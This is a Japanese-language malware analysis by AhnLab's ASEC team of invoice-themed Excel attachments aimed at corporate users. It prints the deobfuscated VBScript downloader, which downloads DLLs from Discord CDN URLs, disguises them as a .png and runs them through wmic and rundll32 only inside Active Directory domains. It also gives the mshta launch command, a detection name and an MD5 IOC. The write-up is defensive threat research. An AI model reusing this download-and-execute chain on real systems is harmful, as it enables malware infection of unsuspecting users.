企業をターゲットとして Invoice に偽装した Excel ドキュメントが拡散

ASEC 分析チームは最近、Invoice に偽装した不正な Excel ドキュメントを確認した。この Excel ファイルは Invoice-[数字]_日付.xlsb というファイル名でメールに添付される形で配布されている。以下は、韓国国内で出回っている不正なメールである。

メールに添付された Excel ファイルを開くと編集が制限されており、以下のように特定の画像が表示され、ユーザーのクリックを誘導する。

また、この画像にはマクロが指定されており、ユーザーが画像をクリックすることでマクロが実行され、不正な振る舞いを行う。Macro1 シートは非表示のシートとして存在し、このシートには以下の図4のように複数の数式がいくつものセルに分かれている。

ユーザーが画像をクリックすると、以下のような警告ウィンドウが表示される。その後、これに対して [OK] や [閉じる] ボタンをクリックすることで、不正な振る舞いが実行される。

その後、実行されたマクロは \%APPDATA%\Microsoft\Excel\XLSTART フォルダーの excel.rtf にファイルを生成し、wmic process call create ‘mshta \%APPDATA%\Microsoft\Excel\XLSTART\excel.rtf’ コマンドでそのファイルを実行する。

excel.rtf ファイルは html ファイルであり、内部には多数のコメントを挿入する等によって、ユーザーが認知しにくい形式にされた不正な VBScript が存在する。以下は、難読化を除去した excel.rtf ファイルのスクリプトである。

<!DOCTYPE html>
<html>
<head>
---中略---
<script type="text/vbscript" LANGUAGE="VBScript" >
Set hRpLar = CreateObject("Wscript.Shell")
fpCHuctA = Replace(hRpLar.expandenvironmentstrings("%LOGONSERVER%"), CHR(92), "")
RBfOKtU = hRpLar.expandenvironmentstrings("%USERDOMAIN%")
If LCase(fpCHuctA) <> LCase(RBfOKtU) Then

For Each WvpdWK in Array("https://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll" , "https://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll")
    Set UWXaoFp = CreateObject("Scripting.FileSystemObject")
    If Not UWXaoFp.FileExists("C:\\ProgramData\spprgrss.png") Then
---中略---
         with FiTmVH
            .type = 1
            .open
            .write djGHweg.responseBody
            .savetofile "C:\\ProgramData\spprgrss.png", 2
            .close
        end with
        With CreateObject("Wscript.Shell")
            .Exec("wmic process call create " & Chr(34) & "rundll32.exe C:\\ProgramData\spprgrss.png BrandMe" & Chr(34))
        End With
---省略---

このスクリプトには %LOGONSERVER% と %USERDOMAIN% の変数値をチェックするコードが存在する。一般ユーザーの場合は当該値が同一なためダウンロードが実行されないことから、AD 環境のユーザーをターゲットにしたマルウェアと推定される。

%LOGONSERVER% と %USERDOMAIN% に設定された値が異なる場合、追加の不正なファイルのダウンロードが行われ、ダウンロードしたファイルは ProgramData フォルダーに spprgrss.png で保存されたあと、wmic process call create “rundll32.exe C:\\ProgramData\spprgrss.png BrandMe” によって実行する。

以下は、このスクリプトに含まれているダウンロード URL である。

• hxxps://cdn.discordapp.com/attachments/899633354561970258/899633408437813278/8_GrooveAudio.dll
• hxxps://cdn.discordapp.com/attachments/899633354561970258/899633406822977536/7_docprop.dll
• hxxps://cdn.discordapp.com/attachments/899633354561970258/899633425420546098/5_System.dll

現在は上記 URL へのアクセスが不可能であり、追加のファイルダウンロードが行われないが、dridex 等のバンキング型マルウェアをダウンロードするものと推定される。

VBA マクロを含む Excel ファイルだけでなく、このように数式マクロを使用する Excel ファイルも持続的に確認されている。これまでも強調してきたように、不明なユーザーから受信したメールの添付ファイルは開かないようにしなければならない。また、ファイルに含まれている不正なマクロが自動で実行されないよう、注意しなければならない。

現在 V3 では、このマルウェアを以下のように検知している。

[ファイル検知]

• Downloader/XLS.Generic

[IOC]

• 8b645dcfa487c9146a9c5b08aeeeb230

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。